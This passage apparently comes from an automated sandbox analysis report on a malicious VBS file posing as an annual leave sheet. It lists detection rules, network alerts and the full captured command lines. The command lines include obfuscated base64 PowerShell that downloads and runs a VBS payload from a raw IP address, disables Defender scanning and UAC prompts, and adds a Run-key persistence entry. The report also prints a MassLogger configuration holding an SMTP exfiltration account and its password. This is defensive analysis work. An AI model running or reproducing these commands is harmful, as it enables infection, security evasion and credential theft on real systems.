o6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmpl
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", ProcessId: 5364, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmpl
                  Sigma detected: DeviceCredentialDeployment Execution
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\DeviceCredentialDeployment.exe", CommandLine: "C:\Windows\system32\DeviceCredentialDeployment.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\DeviceCredentialDeployment.exe, NewProcessName: C:\Windows\System32\DeviceCredentialDeployment.exe, OriginalFileName: C:\Windows\System32\DeviceCredentialDeployment.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\DeviceCredentialDeployment.exe", ProcessId: 5852, ProcessName: DeviceCredentialDeployment.exe
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", ProcessId: 1632, ProcessName: csc.exe
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6756, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nova_kaycee[1].vbs
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 198.54.122.135, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Initiated: true, ProcessId: 1276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49833
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs", ProcessId: 5364, ProcessName: wscript.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6756, TargetFilename: C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))", CommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb

                  Data Obfuscation

                  barindex
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline", ProcessId: 1632, ProcessName: csc.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Register Wscript In Run Key
                  Source: Registry Key setAuthor: Joe Security: Data: Details: wscript.exe "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_542

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-21T16:45:27.566855+010028032742Potentially Bad Traffic192.168.2.549774193.122.6.16880TCP
                  2025-01-21T16:45:43.066710+010028032742Potentially Bad Traffic192.168.2.549876193.122.6.16880TCP
                  2025-01-21T16:45:47.738613+010028032742Potentially Bad Traffic192.168.2.549903193.122.6.16880TCP
                  2025-01-21T16:45:57.566691+010028032742Potentially Bad Traffic192.168.2.549967193.122.6.16880TCP
                  2025-01-21T16:46:07.787342+010028032742Potentially Bad Traffic192.168.2.549930193.122.6.16880TCP
                  2025-01-21T16:46:09.019826+010028032742Potentially Bad Traffic192.168.2.549985193.122.6.16880TCP
                  2025-01-21T16:46:09.394915+010028032742Potentially Bad Traffic192.168.2.550015193.122.6.16880TCP
                  2025-01-21T16:46:21.441724+010028032742Potentially Bad Traffic192.168.2.550024193.122.6.16880TCP
                  2025-01-21T16:46:32.629402+010028032742Potentially Bad Traffic192.168.2.550031193.122.6.16880TCP
                  2025-01-21T16:47:11.785608+010028032742Potentially Bad Traffic192.168.2.550062158.101.44.24280TCP
                  2025-01-21T16:47:17.988588+010028032742Potentially Bad Traffic192.168.2.550062158.101.44.24280TCP
                  2025-01-21T16:47:18.129209+010028032742Potentially Bad Traffic192.168.2.550068158.101.44.24280TCP
                  2025-01-21T16:47:24.035478+010028032742Potentially Bad Traffic192.168.2.550068158.101.44.24280TCP
                  2025-01-21T16:47:25.285511+010028032742Potentially Bad Traffic192.168.2.550078158.101.44.24280TCP
                  2025-01-21T16:47:31.129422+010028032742Potentially Bad Traffic192.168.2.550078158.101.44.24280TCP
                  2025-01-21T16:47:31.441695+010028032742Potentially Bad Traffic192.168.2.550082158.101.44.24280TCP
                  2025-01-21T16:47:37.238575+010028032742Potentially Bad Traffic192.168.2.550082158.101.44.24280TCP
                  2025-01-21T16:47:40.488565+010028032742Potentially Bad Traffic192.168.2.550088158.101.44.24280TCP
                  2025-01-21T16:47:46.426087+010028032742Potentially Bad Traffic192.168.2.550088158.101.44.24280TCP
                  2025-01-21T16:47:47.238613+010028032742Potentially Bad Traffic192.168.2.550091158.101.44.24280TCP
                  2025-01-21T16:47:53.051108+010028032742Potentially Bad Traffic192.168.2.550091158.101.44.24280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-21T16:45:20.198282+010018100002Potentially Bad Traffic192.168.2.549730168.119.145.117443TCP
                  2025-01-21T16:45:43.955524+010018100002Potentially Bad Traffic192.168.2.549881168.119.145.117443TCP
                  2025-01-21T16:45:52.769799+010018100002Potentially Bad Traffic192.168.2.549941168.119.145.117443TCP
                  2025-01-21T16:46:05.309903+010018100002Potentially Bad Traffic192.168.2.550007168.119.145.117443TCP
                  2025-01-21T16:46:16.972293+010018100002Potentially Bad Traffic192.168.2.550021168.119.145.117443TCP
                  2025-01-21T16:46:22.666392+010018100002Potentially Bad Traffic192.168.2.550026168.119.145.117443TCP
                  2025-01-21T16:46:33.422187+010018100002Potentially Bad Traffic192.168.2.550035168.119.145.117443TCP
                  2025-01-21T16:46:47.445275+010018100002Potentially Bad Traffic192.168.2.550045168.119.145.117443TCP
                  2025-01-21T16:46:57.635253+010018100002Potentially Bad Traffic192.168.2.550052168.119.145.117443TCP
                  2025-01-21T16:47:03.533390+010018100002Potentially Bad Traffic192.168.2.550056168.119.145.117443TCP
                  2025-01-21T16:47:10.595121+010018100002Potentially Bad Traffic192.168.2.550061168.119.145.117443TCP
                  2025-01-21T16:47:18.749229+010018100002Potentially Bad Traffic192.168.2.550069168.119.145.117443TCP
                  2025-01-21T16:47:25.043785+010018100002Potentially Bad Traffic192.168.2.550076168.119.145.117443TCP
                  2025-01-21T16:47:34.127854+010018100002Potentially Bad Traffic192.168.2.550086168.119.145.117443TCP
                  2025-01-21T16:47:40.869815+010018100002Potentially Bad Traffic192.168.2.550089168.119.145.117443TCP
                  2025-01-21T16:47:55.519388+010018100002Potentially Bad Traffic192.168.2.550095168.119.145.117443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "ozge.begindim@pakmeya.com", "Password": "Sapsup1481", "Server": "mail.privateemail.com"}
                  Multi AV Scanner detection for submitted file
                  Source: Annual Leave sheet 2025.vbsVirustotal: Detection: 8%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49881 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49941 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50007 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50021 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50026 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50035 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50045 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50052 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50056 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50061 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50065 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50069 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50071 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50076 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50079 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50085 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50086 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50089 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50090 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50093 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50095 version: TLS 1.2
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000016.00000002.2770141611.0000000006B6A000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2850620857.0000000004F1A000.00000004.00000010.00020000.00000000.sdmp
